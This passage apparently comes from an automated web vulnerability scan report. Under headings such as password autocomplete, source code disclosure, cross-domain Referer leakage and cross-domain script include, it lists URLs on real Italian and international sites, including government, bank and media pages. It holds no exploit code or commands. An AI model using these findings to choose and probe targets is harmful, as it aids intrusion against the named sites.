15.83. http://auth.rossoalice.alice.it/aap/serviceforwarder

15.84. http://bs.serving-sys.com/BurstingPipe/adServer.bs

15.85. http://cdn4.eyewonder.com/cm/tr/17671-124835-21707-7

15.86. http://cp.mightyblue.com/default.asp

15.87. http://d.adroll.com/c/N34ZPOW5TRGMJKDEFHM2G4/U6PZANHGRBHQFBIDRUUZ3E/33IKJE45JFAHDG4ETT36VB

15.88. http://d.adroll.com/view/0d742ed1925a733b1b33d771e0b2e1a8

15.89. http://del.icio.us/post

15.90. http://digg.com/submit

15.91. http://en.camera.it/

15.92. http://eni.com/en_IT/company/corporate-communication/eni-social-media/eni-social-media.shtml

15.93. http://eni.com/en_IT/company/culture-energy/figures/figures.shtml

15.94. http://eni.com/en_IT/sustainability/news/2010-10-20-eni-global-leaders-2010.shtml

15.95. https://feedback.live.com/default.aspx

15.96. http://friendfeed.com/share

15.97. http://go.techtarget.com//clicktrack-r/activity/activity.gif

15.98. http://ieo.solution.weborama.fr/fcgi-bin/adserv.fcgi

15.99. http://ieo.solution.weborama.fr/fcgi-bin/adserv.fcgi

15.100. http://it.yahoo.com/add

15.101. http://local.virgilio.it/scripts/jquery.cookie.js

15.102. http://mail.alice.it/

15.103. http://mail.alice.it/common/VIRGILIO/header2008/stili/header_alice.css

15.104. http://mail.alice.it/css/popup.css

15.105. http://mail.alice.it/css/stili.css

15.106. http://mail.alice.it/css/stili_overwrite.css

15.107. http://mail.alice.it/css/stili_stampa.css

15.108. http://mail.alice.it/images/bg_bottombox0.gif

15.109. http://mail.alice.it/images/bg_pop.jpg

15.110. http://mail.alice.it/images/bt_registrati00.gif

15.111. http://mail.alice.it/images/butt_registrati.png

15.112. http://mail.alice.it/images/header/immagine.png

15.113. http://mail.alice.it/images/ico_busta_link.gif

15.114. http://mail.alice.it/images/ico_disc_red.gif

15.115. http://mail.alice.it/images/ico_preferiti.gif

15.116. http://mail.alice.it/images/ico_stampa.gif

15.117. http://mail.alice.it/images/ico_vverde15.gif

15.118. http://mail.alice.it/images/ico_xrosso15.gif

15.119. http://mail.alice.it/js/scriptflash.js

15.120. http://media.fastclick.net/w/tre

15.121. http://media.techtarget.com/rms/ux/css/global.css

15.122. http://media.techtarget.com/rms/ux/css/searchcio-midmarket_new.css

15.123. http://media.techtarget.com/rms/ux/javascript/baynote-lib.js

15.124. http://media.techtarget.com/rms/ux/javascript/googleAnalytics.min.js

15.125. http://media.techtarget.com/rms/ux/javascript/ieFixScripts.js

15.126. http://media.techtarget.com/rms/ux/javascript/jquery-1.4.2.min.js

15.127. http://media.techtarget.com/rms/ux/javascript/jquery.writeCapture.js

15.128. http://media.techtarget.com/rms/ux/javascript/moScripts.js

15.129. http://media.techtarget.com/rms/ux/javascript/tt_scripts.js

15.130. http://media.techtarget.com/rms/ux/javascript/tt_thickbox-compressed.js

15.131. http://media.techtarget.com/rms/ux/javascript/writeCapture.js

15.132. http://metrics.ilsole24ore.com/b/ss/s24onewsprod,s24oglobal/1/H.20.3/s78620203291065

15.133. http://metrics.ilsole24ore.com/b/ss/s24oshoppreprod/1/H.20.3/s76706321355364

15.134. http://nl.sitestat.com/elsevier/elsevier-com/s

15.135. http://nxtck.com/act.php

15.136. http://nxtck.com/act.php

15.137. http://omniture.virgilio.it/b/ss/tiecommercepreprod,tivirgilioglobalpreprod/1/H.22.1/s79412251526955

15.138. http://pixel.rubiconproject.com/tap.php

15.139. http://sdc.eni.it/dcs67gfdv000000ggn52ira0x_5q6n/dcs.gif

15.140. http://sdc.eni.it/dcs67gfdv000000ggn52ira0x_5q6n/dcs.gif

15.141. http://search.yahoo.com/bin/search

15.142. http://searchstorage.techtarget.com/digitalguide/images/buttons/button_closeThisWindow.gif

15.143. http://secure-it.imrworldwide.com/cgi-bin/m

15.144. http://statse.webtrendslive.com/dcsjmy4y8000000w06qbhlh4j_1w6c/dcs.gif

15.145. http://translate.googleapis.com/translate_a/t

15.146. http://twitter.com/home

15.147. http://web.progress.com/docs/gated/campaigns/bpm_search3.htm

15.148. http://www.aeronautica.difesa.it/4NOVEMBRE/PublishingImages/logo_4nov.jpg

15.149. http://www.aeronautica.difesa.it/News/PublishingImages/Accademia%20Aeronautica%20ha%20giurato%20il%20corso%20nibbio%20ha%20giurato%20il%20corso%20nibbio%20V_210411/DSC_0204.JPG

15.150. http://www.aeronautica.difesa.it/News/PublishingImages/Accademia%20Aeronautica%20ha%20giurato%20il%20corso%20nibbio%20ha%20giurato%20il%20corso%20nibbio%20V_210411/DSC_5201.JPG

15.151. http://www.aeronautica.difesa.it/News/PublishingImages/Accademia%20Aeronautica%20ha%20giurato%20il%20corso%20nibbio%20ha%20giurato%20il%20corso%20nibbio%20V_210411/DSC_5239.JPG

15.152. http://www.aeronautica.difesa.it/News/PublishingImages/Accademia%20Aeronautica%20ha%20giurato%20il%20corso%20nibbio%20ha%20giurato%20il%20corso%20nibbio%20V_210411/DSC_5270.JPG

15.153. http://www.aeronautica.difesa.it/News/PublishingImages/Accademia%20Aeronautica%20ha%20giurato%20il%20corso%20nibbio%20ha%20giurato%20il%20corso%20nibbio%20V_210411/DSC_5299.JPG

15.154. http://www.aeronautica.difesa.it/News/PublishingImages/Accademia%20Aeronautica%20ha%20giurato%20il%20corso%20nibbio%20ha%20giurato%20il%20corso%20nibbio%20V_210411/DSC_5322.JPG

15.155. http://www.aeronautica.difesa.it/News/PublishingImages/Video.jpg

15.156. http://www.aeronautica.difesa.it/ScriptResource.axd

15.157. http://www.aeronautica.difesa.it/Style%20Library/AMI/css/admin.css

15.158. http://www.aeronautica.difesa.it/Style%20Library/AMI/css/boxes.css

15.159. http://www.aeronautica.difesa.it/Style%20Library/AMI/css/style.css

15.160. http://www.aeronautica.difesa.it/Style%20Library/AMI/css/styleit-IT.css

15.161. http://www.aeronautica.difesa.it/Style%20Library/AMI/javascript/AMIcore.js

15.162. http://www.aeronautica.difesa.it/Style%20Library/AMI/javascript/sunRiseSet.js

15.163. http://www.aeronautica.difesa.it/WebResource.axd

15.164. http://www.aeronautica.difesa.it/_layouts/1040/ie55up.js

15.165. http://www.aeronautica.difesa.it/_layouts/1040/init.js

15.166. http://www.aeronautica.difesa.it/_layouts/1040/msstring.js

15.167. http://www.aeronautica.difesa.it/_layouts/1040/styles/Menu.css

15.168. http://www.aeronautica.difesa.it/_layouts/AMI/images/bg_ContentHeader.jpg

15.169. http://www.aeronautica.difesa.it/_layouts/AMI/images/bg_LinkArrowsorange.gif

15.170. http://www.aeronautica.difesa.it/_layouts/AMI/images/bg_footer_v2.jpg

15.171. http://www.aeronautica.difesa.it/_layouts/AMI/images/bg_main_v2.jpg

15.172. http://www.aeronautica.difesa.it/_layouts/AMI/images/box_sx_body.gif

15.173. http://www.aeronautica.difesa.it/_layouts/AMI/images/box_sx_bottom.gif

15.174. http://www.aeronautica.difesa.it/_layouts/AMI/images/box_sx_top.gif

15.175. http://www.aeronautica.difesa.it/_layouts/AMI/images/clear.gif

15.176. http://www.aeronautica.difesa.it/_layouts/AMI/images/footer_dns.gif

15.177. http://www.aeronautica.difesa.it/_layouts/AMI/images/footer_logo.gif

15.178. http://www.aeronautica.difesa.it/_layouts/AMI/images/logodifesa.jpg

15.179. http://www.aeronautica.difesa.it/_layouts/AMI/images/menu/bg-subnav.png

15.180. http://www.aeronautica.difesa.it/_layouts/AMI/images/menu/nav-sprite.gif

15.181. http://www.altergaz.fr/

15.182. http://www.bing.com/

15.183. http://www.camera.it/

15.184. http://www.camera.it/1

15.185. http://www.distrigas.eu/

15.186. http://www.energyfordevelopment.it/

15.187. http://www.eni.com/

15.188. http://www.eni.com/'

15.189. http://www.eni.com/attachments/azienda/profilo-compagnia/eni_sintesi_eng.pdf

15.190. http://www.eni.com/attachments/media/press-release/2010/10/press-release-2010-third-quarter-results.pdf

15.191. http://www.eni.com/attachments/media/press-release/2011/02/press-release-2010-fourth-quarter-results.pdf

15.192. http://www.eni.com/attachments/media/press-release/2011/04/press-release-2011-first-quarter-results.pdf

15.193. http://www.eni.com/attachments/publications/reports/reports-2009/Eni-in-2009.pdf

15.194. http://www.eni.com/en_IT/static/css/images/controls.png

15.195. http://www.eni.com/en_IT/static/css/images/loading.gif

15.196. http://www.eni.com/en_IT/static/images/homepage_eni_com/login_active.png

15.197. http://www.eni.com/favicon.ico

15.198. http://www.eni.com/it_IT/static/css/mobile/mobile.css

15.199. http://www.eni.com/it_IT/www-eni-mobi/static/images/logo.gif

15.200. http://www.eni.it/

15.201. http://www.eni.it/mobile/page.do

15.202. http://www.eni.mobi/

15.203. http://zanox01.webtrekk.net/150772050830724/wt.pl

16. Password field with autocomplete enabled

16.1. https://account.musfiber.com/login.php

16.2. http://cp.mightyblue.com/

16.3. http://cp.mightyblue.com/default.asp

16.4. http://digg.com/submit

16.5. http://du.ilsole24ore.com/utenti/Registrazione.aspx

16.6. http://du.ilsole24ore.com/utenti/facebook_connect.aspx

16.7. http://jsdotcom.ilsole24ore.com/js2010/common.min.js

16.8. http://jsdotcom.ilsole24ore.com/js2010/soleLib.js

16.9. http://jsdotcom.ilsole24ore.com/js2010/soleLib.js

16.10. http://mightyblue.com/

16.11. http://pf.rossoalice.alice.it/login.html

16.12. https://secure.mightyblue.com/default.asp

16.13. https://ui.zanox-affiliate.de/bin/z_in_frm.dll

16.14. https://ui.zanox-affiliate.de/bin/z_in_frm.dll

16.15. https://webshop.elsevier.com/login.cfm

16.16. https://webshop.elsevier.com/login.cfm

16.17. https://webshop.elsevier.com/login.cfm

16.18. http://www.genialloyd.it/GlfeWeb/area_personale/recupera_password.jsp

16.19. http://www.genialloyd.it/GlfeWeb/gl/it/home.html

16.20. http://www.sciencedirect.com/science/journal/09574174

16.21. https://www.sciencedirect.com/science

16.22. http://www.shopping24.ilsole24ore.com/sh4/catalog/Category.jsp

16.23. http://www.shopping24.ilsole24ore.com/sh4/catalog/Product.jsp

16.24. http://www.shopping24.ilsole24ore.com/sh4/catalog/order/statoOrdine.jsp

16.25. http://www.telecomitalia.it/

16.26. http://www.telepass.it/ecm/faces/public/telepass/

16.27. http://www.zanox.com/en/

16.28. http://www.zanox.com/us/

17. Source code disclosure

17.1. http://kundenportal.aperto.de/download/zanox/zanox_intro_en.m4v

17.2. http://www.ansa.it/web/video/visual.swf

17.3. http://www.camera.it/javascripts/cache/Camera.94a1c77f6b66cfdcc9636f18c560a41e.js

17.4. https://www.webank.it/webankpub/wb/home.do

18. Referer-dependent response

18.1. http://use.typekit.com/k/prb2oqp-e.css

18.2. http://www.facebook.com/plugins/like.php

19. Cross-domain POST

20. Cross-domain Referer leakage

20.1. http://ad.doubleclick.net/adi/N2886.Tribal_Fusion/B5403001.12

20.2. http://ad.doubleclick.net/adj/els.SDguest/ISSN09574174

20.3. http://ad.doubleclick.net/adj/els.SDguest/ISSN09574174

20.4. http://ad.doubleclick.net/adj/els.SDguest/ISSNgeneral

20.5. http://ad.doubleclick.net/adj/sciom/DEFINITION

20.6. http://ad.doubleclick.net/adj/sciom/DEFINITION

20.7. http://ad.doubleclick.net/adj/sciom/DEFINITION

20.8. http://ad.it.doubleclick.net/adj/Ansa.Motori

20.9. http://ad.it.doubleclick.net/adj/Ansa.Motori

20.10. http://ad.it.doubleclick.net/adj/ansa.home

20.11. http://ad.it.doubleclick.net/adj/ansa.home

20.12. http://ad.it.doubleclick.net/adj/ansa.home

20.13. http://adv.ilsole24ore.it/4/www.ilsole24ore.it/10/_01_000_/_homepage/1014632403@BackGround,Top,VideoBox,VideoBox_2,VideoBox_3,MaxTicker_01,MaxTicker_02,StripMenu_01,Right3,SpotLight_01,SpotLight_02,SpotLight_03,TextBox_01,TextBox_02,TextBox_03,TextBox_04,TextBox_05,TextBox_06,LittleBox_01,LittleBox_02,LittleBox_03,PopUp,PopUnder

20.14. http://adv.ilsole24ore.it/4/www.ilsole24ore.it/10/_01_000_/_homepage/1020182502@BackGround,Top,VideoBox,VideoBox_2,VideoBox_3,MaxTicker_01,MaxTicker_02,StripMenu_01,Right3,SpotLight_01,SpotLight_02,SpotLight_03,TextBox_01,TextBox_02,TextBox_03,TextBox_04,TextBox_05,TextBox_06,LittleBox_01,LittleBox_02,LittleBox_03,PopUp,PopUnder

20.15. http://adv.ilsole24ore.it/4/www.ilsole24ore.it/10/_01_000_/_homepage/1149407908@BackGround,Top,VideoBox,VideoBox_2,VideoBox_3,MaxTicker_01,MaxTicker_02,StripMenu_01,Right3,SpotLight_01,SpotLight_02,SpotLight_03,TextBox_01,TextBox_02,TextBox_03,TextBox_04,TextBox_05,TextBox_06,LittleBox_01,LittleBox_02,LittleBox_03,PopUp,PopUnder

20.16. http://adv.ilsole24ore.it/4/www.ilsole24ore.it/10/_01_000_/_homepage/1229708332@BackGround,Top,VideoBox,VideoBox_2,VideoBox_3,MaxTicker_01,MaxTicker_02,StripMenu_01,Right3,SpotLight_01,SpotLight_02,SpotLight_03,TextBox_01,TextBox_02,TextBox_03,TextBox_04,TextBox_05,TextBox_06,LittleBox_01,LittleBox_02,LittleBox_03,PopUp,PopUnder

20.17. http://adv.ilsole24ore.it/4/www.ilsole24ore.it/10/_01_000_/_homepage/1272227898@BackGround,Top,VideoBox,VideoBox_2,VideoBox_3,MaxTicker_01,MaxTicker_02,StripMenu_01,Right3,SpotLight_01,SpotLight_02,SpotLight_03,TextBox_01,TextBox_02,TextBox_03,TextBox_04,TextBox_05,TextBox_06,LittleBox_01,LittleBox_02,LittleBox_03,PopUp,PopUnder

20.18. http://adv.ilsole24ore.it/4/www.ilsole24ore.it/10/_01_000_/_homepage/1313196972@BackGround,Top,VideoBox,VideoBox_2,VideoBox_3,MaxTicker_01,MaxTicker_02,StripMenu_01,Right3,SpotLight_01,SpotLight_02,SpotLight_03,TextBox_01,TextBox_02,TextBox_03,TextBox_04,TextBox_05,TextBox_06,LittleBox_01,LittleBox_02,LittleBox_03,PopUp,PopUnder

20.19. http://adv.ilsole24ore.it/4/www.ilsole24ore.it/10/_01_000_/_homepage/1322546573@BackGround,Top,VideoBox,VideoBox_2,VideoBox_3,MaxTicker_01,MaxTicker_02,StripMenu_01,Right3,SpotLight_01,SpotLight_02,SpotLight_03,TextBox_01,TextBox_02,TextBox_03,TextBox_04,TextBox_05,TextBox_06,LittleBox_01,LittleBox_02,LittleBox_03,PopUp,PopUnder

20.20. http://adv.ilsole24ore.it/4/www.ilsole24ore.it/10/_01_000_/_homepage/1323604821@BackGround,Top,VideoBox,VideoBox_2,VideoBox_3,MaxTicker_01,MaxTicker_02,StripMenu_01,Right3,SpotLight_01,SpotLight_02,SpotLight_03,TextBox_01,TextBox_02,TextBox_03,TextBox_04,TextBox_05,TextBox_06,LittleBox_01,LittleBox_02,LittleBox_03,PopUp,PopUnder

20.21. http://adv.ilsole24ore.it/4/www.ilsole24ore.it/10/_01_000_/_homepage/1480769044@BackGround,Top,VideoBox,VideoBox_2,VideoBox_3,MaxTicker_01,MaxTicker_02,StripMenu_01,Right3,SpotLight_01,SpotLight_02,SpotLight_03,TextBox_01,TextBox_02,TextBox_03,TextBox_04,TextBox_05,TextBox_06,LittleBox_01,LittleBox_02,LittleBox_03,PopUp,PopUnder

20.22. http://adv.ilsole24ore.it/4/www.ilsole24ore.it/10/_01_000_/_homepage/1498101456@BackGround,Top,VideoBox,VideoBox_2,VideoBox_3,MaxTicker_01,MaxTicker_02,StripMenu_01,Right3,SpotLight_01,SpotLight_02,SpotLight_03,TextBox_01,TextBox_02,TextBox_03,TextBox_04,TextBox_05,TextBox_06,LittleBox_01,LittleBox_02,LittleBox_03,PopUp,PopUnder

20.23. http://adv.ilsole24ore.it/4/www.ilsole24ore.it/10/_01_000_/_homepage/1548590051@BackGround,Top,VideoBox,VideoBox_2,VideoBox_3,MaxTicker_01,MaxTicker_02,StripMenu_01,Right3,SpotLight_01,SpotLight_02,SpotLight_03,TextBox_01,TextBox_02,TextBox_03,TextBox_04,TextBox_05,TextBox_06,LittleBox_01,LittleBox_02,LittleBox_03,PopUp,PopUnder

20.24. http://adv.ilsole24ore.it/4/www.ilsole24ore.it/10/_01_000_/_homepage/1661065426@BackGround,Top,VideoBox,VideoBox_2,VideoBox_3,MaxTicker_01,MaxTicker_02,StripMenu_01,Right3,SpotLight_01,SpotLight_02,SpotLight_03,TextBox_01,TextBox_02,TextBox_03,TextBox_04,TextBox_05,TextBox_06,LittleBox_01,LittleBox_02,LittleBox_03,PopUp,PopUnder

20.25. http://adv.ilsole24ore.it/4/www.ilsole24ore.it/10/_01_000_/_homepage/1675862492@BackGround,Top,VideoBox,VideoBox_2,VideoBox_3,MaxTicker_01,MaxTicker_02,StripMenu_01,Right3,SpotLight_01,SpotLight_02,SpotLight_03,TextBox_01,TextBox_02,TextBox_03,TextBox_04,TextBox_05,TextBox_06,LittleBox_01,LittleBox_02,LittleBox_03,PopUp,PopUnder

20.26. http://adv.ilsole24ore.it/4/www.ilsole24ore.it/10/_01_000_/_homepage/1705065391@BackGround,Top,VideoBox,VideoBox_2,VideoBox_3,MaxTicker_01,MaxTicker_02,StripMenu_01,Right3,SpotLight_01,SpotLight_02,SpotLight_03,TextBox_01,TextBox_02,TextBox_03,TextBox_04,TextBox_05,TextBox_06,LittleBox_01,LittleBox_02,LittleBox_03,PopUp,PopUnder

20.27. http://adv.ilsole24ore.it/4/www.ilsole24ore.it/10/_01_000_/_homepage/1794618068@BackGround,Top,VideoBox,VideoBox_2,VideoBox_3,MaxTicker_01,MaxTicker_02,StripMenu_01,Right3,SpotLight_01,SpotLight_02,SpotLight_03,TextBox_01,TextBox_02,TextBox_03,TextBox_04,TextBox_05,TextBox_06,LittleBox_01,LittleBox_02,LittleBox_03,PopUp,PopUnder

20.28. http://adv.ilsole24ore.it/4/www.ilsole24ore.it/10/_01_000_/_homepage/1827877485@BackGround,Top,VideoBox,VideoBox_2,VideoBox_3,MaxTicker_01,MaxTicker_02,StripMenu_01,Right3,SpotLight_01,SpotLight_02,SpotLight_03,TextBox_01,TextBox_02,TextBox_03,TextBox_04,TextBox_05,TextBox_06,LittleBox_01,LittleBox_02,LittleBox_03,PopUp,PopUnder

20.29. http://adv.ilsole24ore.it/4/www.ilsole24ore.it/10/_01_000_/_homepage/1929539320@BackGround,Top,VideoBox,VideoBox_2,VideoBox_3,MaxTicker_01,MaxTicker_02,StripMenu_01,Right3,SpotLight_01,SpotLight_02,SpotLight_03,TextBox_01,TextBox_02,TextBox_03,TextBox_04,TextBox_05,TextBox_06,LittleBox_01,LittleBox_02,LittleBox_03,PopUp,PopUnder

20.30. http://adv.ilsole24ore.it/4/www.ilsole24ore.it/10/_01_000_/_homepage/1958204899@BackGround,Top,VideoBox,VideoBox_2,VideoBox_3,MaxTicker_01,MaxTicker_02,StripMenu_01,Right3,SpotLight_01,SpotLight_02,SpotLight_03,TextBox_01,TextBox_02,TextBox_03,TextBox_04,TextBox_05,TextBox_06,LittleBox_01,LittleBox_02,LittleBox_03,PopUp,PopUnder

20.31. http://adv.ilsole24ore.it/4/www.ilsole24ore.it/10/_02_060_/_notizie_/_asia_oceania/1977279031@Top,VideoBox,VideoBox_2,VideoBox_180x150,MaxTicker_01,PopUp,PopUnder

20.32. http://adv.ilsole24ore.it/4/www.ilsole24ore.it/luxury24/1185651268@MaxTicker_01,Top,VideoBox,SpotLight_01,SpotLight_02,SpotLight_03,HalfPage,PopUp,BackGround

20.33. http://adv.ilsole24ore.it/RealMedia/ads/click_lx.ads/www.ilsole24ore.it/07/sole5/shopping24/926333658/Top/OasDefault/BancaPopMilano_XGR_am_110502/83881.html/61646331643666333464626632633930

20.34. http://expertsystem.net/clienti_dettaglio.asp

20.35. http://expertsystem.net/clienti_elenco.asp

20.36. http://expertsystem.net/clienti_home.asp

20.37. http://expertsystem.net/page.asp

20.38. http://expertsystem.net/page.asp

20.39. http://expertsystem.net/page.asp

20.40. http://expertsystem.net/page.asp

20.41. http://expertsystem.net/page.asp

20.42. http://fls.doubleclick.net/activityi

20.43. http://googleads.g.doubleclick.net/pagead/ads

20.44. http://googleads.g.doubleclick.net/pagead/ads

20.45. http://jsdotcom.ilsole24ore.com/js2010/soleLib.js

20.46. http://jsdotcom.ilsole24ore.com/sez2010/finanza-e-mercati/json/FinanzaMercatiUser/HPSole-FinanzaMercatiJS.js

20.47. http://nl.sitestat.com/elsevier/elsevier-com/s

20.48. http://s0.2mdn.net/1925925/091710sciomm_int_GapAnalysis.html

20.49. http://searchcio-midmarket.techtarget.com/

20.50. http://translate.googleapis.com/translate_a/t

20.51. https://ui.zanox-affiliate.de/bin/z_in_frm.dll

20.52. https://ui.zanox-affiliate.de/bin/z_in_frm.dll

20.53. https://ui.zanox-affiliate.de/bin/z_in_frm.dll

20.54. http://webshop.elsevier.com/myarticleservices/booklets/

20.55. http://webshop.elsevier.com/specialissues/

20.56. http://www.bing.com/search

20.57. http://www.bing.com/search

20.58. http://www.bing.com/search

20.59. http://www.elsevier.com/order_issues

20.60. http://www.eni.com/en_IT/hp_dx_flash.html

20.61. http://www.eni.com/en_IT/hp_dx_tab.html

20.62. http://www.eni.it/mobile/page.do

20.63. http://www.eni.mobi/

20.64. http://www.facebook.com/plugins/like.php

20.65. http://www.ilsole24ore.com/

20.66. http://www.ilsole24ore.com/art/notizie/2011-05-02/morte-bin-laden-pakistan-afghanistan-093710.shtml

20.67. http://www.luxury24.ilsole24ore.com/

20.68. http://www.shopping24.ilsole24ore.com/sh4/catalog/Category.jsp

20.69. http://www.shopping24.ilsole24ore.com/sh4/catalog/Product.jsp

20.70. http://www.shopping24.ilsole24ore.com/sh4/catalog/order/statoOrdine.jsp

20.71. http://www.telecomitalia.it/sites/all/modules/custom/ti_auth/js/check.min.js

20.72. http://www.telepass.it/resources/custom/script/customffba.js

20.73. https://www.webank.it/webankpub/wb/2l/do/aol/wbwsPUaol0.do

21. Cross-domain script include

21.1. http://ad.doubleclick.net/adi/N2886.Tribal_Fusion/B5403001.12

21.2. http://adv.ilsole24ore.it/4/www.ilsole24ore.it/10/_01_000_/_homepage/1020182502@BackGround,Top,VideoBox,VideoBox_2,VideoBox_3,MaxTicker_01,MaxTicker_02,StripMenu_01,Right3,SpotLight_01,SpotLight_02,SpotLight_03,TextBox_01,TextBox_02,TextBox_03,TextBox_04,TextBox_05,TextBox_06,LittleBox_01,LittleBox_02,LittleBox_03,PopUp,PopUnder

21.3. http://adv.ilsole24ore.it/4/www.ilsole24ore.it/10/_01_000_/_homepage/1149407908@BackGround,Top,VideoBox,VideoBox_2,VideoBox_3,MaxTicker_01,MaxTicker_02,StripMenu_01,Right3,SpotLight_01,SpotLight_02,SpotLight_03,TextBox_01,TextBox_02,TextBox_03,TextBox_04,TextBox_05,TextBox_06,LittleBox_01,LittleBox_02,LittleBox_03,PopUp,PopUnder

21.4. http://adv.ilsole24ore.it/4/www.ilsole24ore.it/10/_01_000_/_homepage/1272227898@BackGround,Top,VideoBox,VideoBox_2,VideoBox_3,MaxTicker_01,MaxTicker_02,StripMenu_01,Right3,SpotLight_01,SpotLight_02,SpotLight_03,TextBox_01,TextBox_02,TextBox_03,TextBox_04,TextBox_05,TextBox_06,LittleBox_01,LittleBox_02,LittleBox_03,PopUp,PopUnder

21.5. http://adv.ilsole24ore.it/4/www.ilsole24ore.it/10/_01_000_/_homepage/1313196972@BackGround,Top,VideoBox,VideoBox_2,VideoBox_3,MaxTicker_01,MaxTicker_02,StripMenu_01,Right3,SpotLight_01,SpotLight_02,SpotLight_03,TextBox_01,TextBox_02,TextBox_03,TextBox_04,TextBox_05,TextBox_06,LittleBox_01,LittleBox_02,LittleBox_03,PopUp,PopUnder

21.6. http://adv.ilsole24ore.it/4/www.ilsole24ore.it/10/_01_000_/_homepage/1323604821@BackGround,Top,VideoBox,VideoBox_2,VideoBox_3,MaxTicker_01,MaxTicker_02,StripMenu_01,Right3,SpotLight_01,SpotLight_02,SpotLight_03,TextBox_01,TextBox_02,TextBox_03,TextBox_04,TextBox_05,TextBox_06,LittleBox_01,LittleBox_02,LittleBox_03,PopUp,PopUnder

21.7. http://adv.ilsole24ore.it/4/www.ilsole24ore.it/10/_01_000_/_homepage/1480769044@BackGround,Top,VideoBox,VideoBox_2,VideoBox_3,MaxTicker_01,MaxTicker_02,StripMenu_01,Right3,SpotLight_01,SpotLight_02,SpotLight_03,TextBox_01,TextBox_02,TextBox_03,TextBox_04,TextBox_05,TextBox_06,LittleBox_01,LittleBox_02,LittleBox_03,PopUp,PopUnder

21.8. http://adv.ilsole24ore.it/4/www.ilsole24ore.it/10/_01_000_/_homepage/1498101456@BackGround,Top,VideoBox,VideoBox_2,VideoBox_3,MaxTicker_01,MaxTicker_02,StripMenu_01,Right3,SpotLight_01,SpotLight_02,SpotLight_03,TextBox_01,TextBox_02,TextBox_03,TextBox_04,TextBox_05,TextBox_06,LittleBox_01,LittleBox_02,LittleBox_03,PopUp,PopUnder

21.9. http://adv.ilsole24ore.it/4/www.ilsole24ore.it/10/_01_000_/_homepage/1548590051@BackGround,Top,VideoBox,VideoBox_2,VideoBox_3,MaxTicker_01,MaxTicker_02,StripMenu_01,Right3,SpotLight_01,SpotLight_02,SpotLight_03,TextBox_01,TextBox_02,TextBox_03,TextBox_04,TextBox_05,TextBox_06,LittleBox_01,LittleBox_02,LittleBox_03,PopUp,PopUnder

21.10. http://adv.ilsole24ore.it/4/www.ilsole24ore.it/10/_01_000_/_homepage/1661065426@BackGround,Top,VideoBox,VideoBox_2,VideoBox_3,MaxTicker_01,MaxTicker_02,StripMenu_01,Right3,SpotLight_01,SpotLight_02,SpotLight_03,TextBox_01,TextBox_02,TextBox_03,TextBox_04,TextBox_05,TextBox_06,LittleBox_01,LittleBox_02,LittleBox_03,PopUp,PopUnder

21.11. http://adv.ilsole24ore.it/4/www.ilsole24ore.it/10/_01_000_/_homepage/1661065426@BackGround,Top,VideoBox,VideoBox_2,VideoBox_3,MaxTicker_01,MaxTicker_02,StripMenu_01,Right3,SpotLight_01,SpotLight_02,SpotLight_03,TextBox_01,TextBox_02,TextBox_03,TextBox_04,TextBox_05,TextBox_06,LittleBox_01,LittleBox_02,LittleBox_03,PopUp,PopUnder

21.12. http://adv.ilsole24ore.it/4/www.ilsole24ore.it/10/_01_000_/_homepage/1705065391@BackGround,Top,VideoBox,VideoBox_2,VideoBox_3,MaxTicker_01,MaxTicker_02,StripMenu_01,Right3,SpotLight_01,SpotLight_02,SpotLight_03,TextBox_01,TextBox_02,TextBox_03,TextBox_04,TextBox_05,TextBox_06,LittleBox_01,LittleBox_02,LittleBox_03,PopUp,PopUnder

21.13. http://adv.ilsole24ore.it/4/www.ilsole24ore.it/10/_01_000_/_homepage/1827877485@BackGround,Top,VideoBox,VideoBox_2,VideoBox_3,MaxTicker_01,MaxTicker_02,StripMenu_01,Right3,SpotLight_01,SpotLight_02,SpotLight_03,TextBox_01,TextBox_02,TextBox_03,TextBox_04,TextBox_05,TextBox_06,LittleBox_01,LittleBox_02,LittleBox_03,PopUp,PopUnder

21.14. http://adv.ilsole24ore.it/4/www.ilsole24ore.it/10/_01_000_/_homepage/1929539320@BackGround,Top,VideoBox,VideoBox_2,VideoBox_3,MaxTicker_01,MaxTicker_02,StripMenu_01,Right3,SpotLight_01,SpotLight_02,SpotLight_03,TextBox_01,TextBox_02,TextBox_03,TextBox_04,TextBox_05,TextBox_06,LittleBox_01,LittleBox_02,LittleBox_03,PopUp,PopUnder

21.15. http://adv.ilsole24ore.it/4/www.ilsole24ore.it/10/_01_000_/_homepage/1958204899@BackGround,Top,VideoBox,VideoBox_2,VideoBox_3,MaxTicker_01,MaxTicker_02,StripMenu_01,Right3,SpotLight_01,SpotLight_02,SpotLight_03,TextBox_01,TextBox_02,TextBox_03,TextBox_04,TextBox_05,TextBox_06,LittleBox_01,LittleBox_02,LittleBox_03,PopUp,PopUnder

21.16. http://adv.ilsole24ore.it/4/www.ilsole24ore.it/10/_02_060_/_notizie_/_asia_oceania/1977279031@Top,VideoBox,VideoBox_2,VideoBox_180x150,MaxTicker_01,PopUp,PopUnder

21.17. http://adv.ilsole24ore.it/4/www.ilsole24ore.it/luxury24/1185651268@MaxTicker_01,Top,VideoBox,SpotLight_01,SpotLight_02,SpotLight_03,HalfPage,PopUp,BackGround

21.18. http://adv.ilsole24ore.it/5/www.ilsole24ore.it/10/_01_000_/_homepage/766161316/VideoBox/OasDefault/Transition_SHP_b1_110502/8728887291.html/61646331643666333464626632633930

21.19. http://adv.ilsole24ore.it/RealMedia/ads/adstream_jx.ads/www.ilsole24ore.it/07/sole5/shopping24/1004777786@Top

21.20. http://adv.ilsole24ore.it/RealMedia/ads/adstream_jx.ads/www.ilsole24ore.it/07/sole5/shopping24/1042849514@Top

21.21. http://adv.ilsole24ore.it/RealMedia/ads/adstream_jx.ads/www.ilsole24ore.it/07/sole5/shopping24/1069815955@VideoBox

21.22. http://adv.ilsole24ore.it/RealMedia/ads/adstream_jx.ads/www.ilsole24ore.it/07/sole5/shopping24/1129870245@Top

21.23. http://adv.ilsole24ore.it/RealMedia/ads/adstream_jx.ads/www.ilsole24ore.it/07/sole5/shopping24/1234890180@VideoBox

21.24. http://adv.ilsole24ore.it/RealMedia/ads/adstream_jx.ads/www.ilsole24ore.it/07/sole5/shopping24/1265414101@Top

21.25. http://adv.ilsole24ore.it/RealMedia/ads/adstream_jx.ads/www.ilsole24ore.it/07/sole5/shopping24/1280012379@VideoBox

21.26. http://adv.ilsole24ore.it/RealMedia/ads/adstream_jx.ads/www.ilsole24ore.it/07/sole5/shopping24/1280277858@Top

21.27. http://adv.ilsole24ore.it/RealMedia/ads/adstream_jx.ads/www.ilsole24ore.it/07/sole5/shopping24/1284965279@VideoBox

